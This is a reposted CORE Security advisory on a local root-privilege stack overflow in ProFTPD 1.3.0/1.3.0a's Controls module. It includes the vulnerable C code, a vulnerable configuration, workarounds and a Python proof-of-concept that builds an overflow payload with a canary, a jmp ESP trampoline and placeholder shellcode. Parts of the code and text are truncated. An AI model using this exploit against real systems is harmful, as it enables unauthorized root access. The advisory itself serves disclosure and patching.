[UNIX] ProFTPD Controls Buffer Overflow

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.

- - - - - - - - -

ProFTPD Controls Buffer Overflow


A locally exploitable stack overflow vulnerability has been found in the
mod_ctrls module of ProFTPD server.

ProFTPD is a commonly used and highly configurable FTP server for Unix and
Windows systems. This server is available as an optional package in most
recent Linux distributions, including Debian (sid), Mandriva 2007 and
Ubuntu Edgy. For more information concerning ProFTPD, refer to the site
http <://www.proftpd.org/> ://www.proftpd.org/

The vulnerability is located in the "Controls" module. This is an optional
feature of ProFTPD server, that must be activated in the configuration
file. Controls are a way to communicate directly with a standalone ProFTPD
daemon while it is running. This provides administrators a way to alter
the daemon's behavior in real time, without having to restart the daemon
and have it re-read its configuration. The Controls feature allow
authorized users to locally manage parameters of the ProFTPD servers, like
aborting connections, managing users, changing log levels, disabling
individual virtual servers, etc.

The vulnerability allows local attackers with access to the Controls
features (and who have been allowed by Controls ACLs in proftpd.conf) to
gain root privileges.


Vulnerable Systems:
* ProFTPD version 1.3.0a
* ProFTPD version 1.3.0

Immune Systems:
* ProFTPD version 1.3.1rc1

Technical Description - Exploit/Concept Code:
The vulnerability exists in pr_ctrls_recv_request() function from

Analysis of the vulnerability follows:
(Code from ProFTPD 1.3.0a, src/ctrls.c )

int pr_ctrls_recv_request(pr_ctrls_cl_t *cl) {
pr_ctrls_t *ctrl = NULL, *next_ctrl = NULL;
char reqaction[512] = {'\0'}, *reqarg = NULL;
size_t reqargsz = 0;
unsigned int nreqargs = 0, reqarglen = 0;


/* Next, read in the requested number of arguments. The client sends
* the arguments in pairs: first the length of the argument, then the
* argument itself. The first argument is the action, so get the first
* matching pr_ctrls_t (if present), and add the remaining arguments to


if (read(cl->cl_fd, &reqarglen, sizeof(unsigned int)) < 0) {
return -1;


if (read(cl->cl_fd, reqaction, reqarglen) < 0) {
return -1;

In (1) the integer 'reqarglen' is fully controlled by the attacker, as
it's read directly from the control socket. This allows an attacker to
control how much we read into the 'reqaction' variable in (2) (this
variable is in the stack).

Example of vulnerable configuration in proftpd.conf:
<IfModule mod_ctrls.c>
ControlsEngine on
ControlsACLs all allow group someuser
ControlsMaxClients 2
ControlsLog /var/log/proftpd/controls.log
ControlsInterval 5
ControlsSocket /tmp/ctrls.sock
ControlsSocketOwner someuser someuser
ControlsSocketACL allow group someuser

ProFTPD must be compiled with mod_ctrls support ( --enable-ctrls ).

The following is a simple working proof-of-concept (Python).

For more information concerning the Controls module, refer to
<http://www.castaglia.org/proftpd/doc/contrib/ProFTPD-mini-HOWTO-Controls.html> http://www.castaglia.org/proftpd/doc/contrib/ProFTPD-mini-HOWTO-Controls.html

Solution/Vendor Information/Workaround:
As a workaround, turn off the module mod_ctrls, with the following lines
added to proftpd.conf:

<IfModule mod_ctrls.c>
ControlsEngine off

Alternatively, administrators can use the ControlsACLs directive in
proftpd.conf to restrict access only to trusted local users.

Version 1.3.1rc1 of ProFTPD, which fixes this issue, is available on the
<http://www.proftpd.org/> ProFTPD site.

# Core Security Technologies - Corelabs Advisory
# ProFTPD Controls buffer overflow

import socket
import os, os.path,stat

#This works with default proftpd 1.3.0a compiled with gcc 4.1.2 (ubuntu
ctrlSocket = "/tmp/ctrls.sock"
mySocket = "/tmp/notused.sock"
canary = "\0\0\x0a\xff"
trampoline = "\x77\xe7\xff\xff" # jmp ESP on vdso
shellcode = "\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc" # inocuous "int 3"

#Build Payload. The format on the stack is:
payload = ("A"*512) + canary + "AAAABBBBCCCCDDDD" + trampoline + shellcode

#Setup socket
if os.path.exists(mySocket):
s = socket.socket(socket.AF_UNIX,socket.SOCK_STREAM)

#Send payload
l = len(payload)
s.send(chr(l & 255)+chr((l/255) & 255)+"\0\0")



The information has been provided by <mailto:advisories@xxxxxxxxxxxxxxxx>
CORE Security Technologies Advisories.
The original article can be found at:


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.